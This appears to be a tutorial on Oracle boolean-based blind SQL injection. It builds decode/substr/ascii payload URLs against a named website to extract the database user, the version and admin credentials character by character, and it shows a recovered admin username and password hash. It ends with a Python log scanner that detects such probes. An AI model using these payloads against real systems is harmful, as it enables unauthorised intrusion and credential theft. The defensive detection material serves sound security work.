0x01 Boolean-based blind injection with the decode function
decode(field or expression, value1, value2, value3)
When the function runs, if the computed field or expression equals value1 it returns value2; otherwise it returns value3.
Of course value1, value2 and value3 may themselves be expressions, so this single function can stand in for many simple SQL statements.
Usage:
Comparing two values
select decode(sign(variable1-variable2),-1,variable1,variable2) from dual; -- returns whichever is smaller
The sign() function returns 0, 1 or -1 depending on whether its argument is zero, positive or negative.
For example:
variable1 = 10, variable2 = 20
Then sign(variable1-variable2) returns -1, and decode resolves to "variable1", which achieves the goal of taking the smaller value.
SQL> select decode(sign(10-20),-1,10,20) from dual;

DECODE(SIGN(10-20),-1,10,20)
----------------------------
                          10
So how do we apply decode to injection?
Test the current user
select decode(user,'SYSTEM',1,0) from dual;
If the current user is SYSTEM this returns 1, otherwise it returns 0.
SQL> select decode(user,'SYSTEM',1,0) from dual;

DECODE(USER,'SYSTEM',1,0)
-------------------------
                        1

SQL> select decode(user,'SYS',1,0) from dual;

DECODE(USER,'SYS',1,0)
----------------------
                     0
Applying decode for blind injection at the injection point
Determine whether the current user is SCOTT
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(user,'SCOTT',1,0) from dual) --
The current user can be guessed one character at a time using the substr() function
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
Here we only need to swap in a different inner query; the possibilities cannot all be listed, but for example, to query the Oracle version and determine whether its first character is O:
http://www.jsporcle.com/a.jsp?username=SMITH' and 1=(select decode(substr((select banner from sys.v_$version where rownum=1),1,1),'O',1,0) from dual) --
Get the current user
(select user from dual)
Get the current version
(select banner from sys.v_$version where rownum=1)
Get the account and password from the admin table
(select username||password from admin)
Get the string length
select length(user) from dual --
select * from art where id=1 and 6=(select length(user) from dual) --
http://www.jsporcle.com/news.jsp?id=1 and 6=(select length(user) from dual) --
Whether the first letter of the current user is S: returns 1 if equal, otherwise 0
(select decode(substr(user,1,1),'S',1,0) from dual) --
(select decode(substr(user,2,1),'Y',1,0) from dual) --
(select decode(substr(user,3,1),'S',1,0) from dual) --
(select decode(substr(user,4,1),'T',1,0) from dual) --
(select decode(substr(user,5,1),'E',1,0) from dual) --
(select decode(substr(user,6,1),'N',1,0) from dual) --
Statement to test the current user
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr(user,1,1),'S',1,0) from dual) --
Get the account and password from the admin table
select * from art where id=1 and 1=(select decode(substr((select username||password from admin),1,1),'a',1,0) from dual)
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),1,1),'a',1,0) from dual)
Character set to test each position against
abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.
When querying the second character
http://www.jsporcle.com/news.jsp?id=1 and 1=(select decode(substr((select username%7c%7cpassword from admin),2,1),'d',1,0) from dual) --
Once the usage of these functions is roughly understood, running a script to brute-force the rest is enough; Burp Suite is one example.
0x02 General blind injection method: guessing character by character
First get the data length
37=(select length(username||password) from admin)
URL-encoded test
http://www.jsporcle.com/news.jsp?id=1 and 37=(select length(username%7c%7cpassword) from admin)--
select * from art where id=1 and 37=(select length(username||password) from admin);
Guess the ASCII code
http://www.jsporcle.com/news.jsp?id=1 and (select ascii(substr(username%7c%7cpassword,1,1)) from admin)=97 --
Likewise, brute-force with Burp or a script
Guessed result: admine10adc3949ba59abbe56e057f20f883e
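From the defender's side, the probes above have a recognisable shape in web server logs once the URL encoding (%7c%7c for ||, %20 for spaces) is stripped. The following Python is an added example, not code from the original post: it scans constructed Apache-style log lines for the decode/substr, length and ascii signatures discussed here; the log lines, IP addresses and pattern names are assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic), shaped like the
# requests discussed above: a decode()/substr() probe, a length() check,
# an ascii() probe, and one benign request.
SAMPLE_LOG = """
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /a.jsp?username=SMITH'%20and%201=(select%20decode(substr(user,1,1),'S',1,0)%20from%20dual)%20-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /news.jsp?id=1%20and%2037=(select%20length(username%7c%7cpassword)%20from%20admin)-- HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /news.jsp?id=1%20and%20(select%20ascii(substr(username%7c%7cpassword,1,1))%20from%20admin)=97%20-- HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /news.jsp?id=42 HTTP/1.1" 200 2048
"""

# Signatures of the Oracle boolean-blind probes on this page. They are
# matched after URL decoding so that %7c%7c and %20 cannot hide them.
PATTERNS = {
    "decode_compare": re.compile(r"\bdecode\s*\(\s*substr\s*\(", re.I),
    "decode_user":    re.compile(r"\bdecode\s*\(\s*user\s*,", re.I),
    "length_probe":   re.compile(r"=\s*\(\s*select\s+length\s*\(", re.I),
    "ascii_probe":    re.compile(r"\bascii\s*\(\s*substr\s*\(", re.I),
    "version_view":   re.compile(r"sys\.v_\$version", re.I),
    "from_dual":      re.compile(r"\bfrom\s+dual\b", re.I),
}

# Common log format: client ip, ident, user, [timestamp] "METHOD url ..."
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)')

def scan_log(text):
    """Return (client_ip, path, [matched pattern names]) per suspicious request."""
    hits = []
    for line in text.strip().splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        ip, _ts, raw_url = m.groups()
        url = unquote_plus(raw_url)          # decode %7c%7c, %20, etc.
        names = [n for n, p in PATTERNS.items() if p.search(url)]
        if names:
            hits.append((ip, url.split("?", 1)[0], names))
    return hits

if __name__ == "__main__":
    for ip, path, names in scan_log(SAMPLE_LOG):
        print(ip, path, ",".join(names))
```

Several hits from one client against the same path within seconds is the character-by-character pattern the post describes; the same decoding step should be applied before any WAF or SIEM rule is evaluated, since the raw request only shows the encoded form.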